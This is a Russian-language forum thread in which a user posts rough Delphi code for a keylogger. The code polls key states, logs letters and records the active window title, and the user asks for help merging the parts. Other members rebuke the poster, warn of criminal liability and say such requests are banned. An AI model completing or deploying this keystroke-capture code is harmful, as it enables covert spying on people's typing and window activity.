![]() |
|
|
Регистрация Восстановить пароль |
Регистрация | Задать вопрос |
Заплачу за решение |
Новые сообщения |
Сообщения за день |
Расширенный поиск |
Правила |
Всё прочитано |
![]() |
|
Опции темы | Поиск в этой теме |
![]() |
#1 |
|
![]()
Всем привет )) вот хочу написать программу которые будет перехватывать клавиши А сверху клавиш будет заголовок активного окна ))) может кто-то поможет мне не могу разобраться ))
Вот сам код (Ketlogger) procedure TForm1.Timer2Timer(Sender: TObject); var i : byte; begin for i:=8 To 222 do begin if GetAsyncKeyState(i)=-32767 then begin case i of 65..90 : // a..z , A..Z begin if GetKeyState(VK_SHIFT)<0 then memo1.text:=memo1.text+LowerCase(Ch r(i)) //a..z else memo1.text:=memo1.text+UpperCase(Ch r(i)) //A..Z end; end; end; end; end; end. /////////////// А вот сам код активного окна procedure TForm1.Timer1Timer(Sender: TObject); Var wnd1,wnd2:hwnd; A:array[0..255] of char; begin wnd1:=FindWindow(nil,'Диспетчер задач Windows'); wnd2:=GetForeGroundWindow; //По хэнделу можно определить заголовок окна функцией GetWindowText GetWindowText(wnd2,A,255); Memo1.text:=('Окно'+ #13+#10 + A); end; end. ////////// смотрим на картинку что-получилось |
![]() |
![]() |
![]() |
#2 |
Старожил
|
![]()
Ужс ))
Смотри в сторону хуков и УК |
![]() |
![]() |
![]() |
#3 | |
C++ &amp; PHP &amp; Asm
Форумчанин
|
![]() Цитата:
А так, Вам не надоело обращаться с такими вопросами каждую неделю? Уже по стопятцот раз всё разжевано и пережевано, и Вы ей богу надоели мастерить говно-мальварь и потом впаривать сие подделки на хак-форумах. Темболее на VLC давно уже никто не кодит всякую бяку, а те кто хоть чуть-чуть познали WinAPI - делают жутко неправильную бяку. А те кто усиленно занимается этой темой, давно используют недок. API для достижения своих целей. А насчет хуков, то они ана..но караются при проверке сигн аверами, если софтина не подписана, и не внушает никакого доверия. А мусор весь давно с легкостью отсекается проактивкой. |
|
![]() |
![]() |
![]() |
#4 |
------------------
Пользователь
|
![]()
Насколько я знаю, подобноё запрещено на этом форуме. Да и народ правильно говорит, не лезь туда, о чём не знаешь.
P.S. Хотя скажу честно программированием начал увлекаться именно благодаря хаку. Теперь просто пишу для себя))
C YBA}|{EH|/|EM Tip.the.besT
|
![]() |
![]() |
![]() |
![]() |
||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Delphi Close Handle патока процесса | jone | Win Api | 16 | 25.04.2012 12:42 |
Statusbar и Handle / Delphi | unreal2x | Помощь студентам | 0 | 05.04.2012 12:26 |
Undeclared identifier Handle в Delphi 2010 | demiancz | Общие вопросы Delphi | 2 | 24.08.2011 12:44 |
Как узнать handle окна имея handle обного из его компонентов | SeRhy | Win Api | 2 | 18.10.2009 19:31 |
Как имея handle окна узнать handle edit-a который находится в етом окне | SeRhy | Общие вопросы Delphi | 1 | 20.07.2008 13:48 |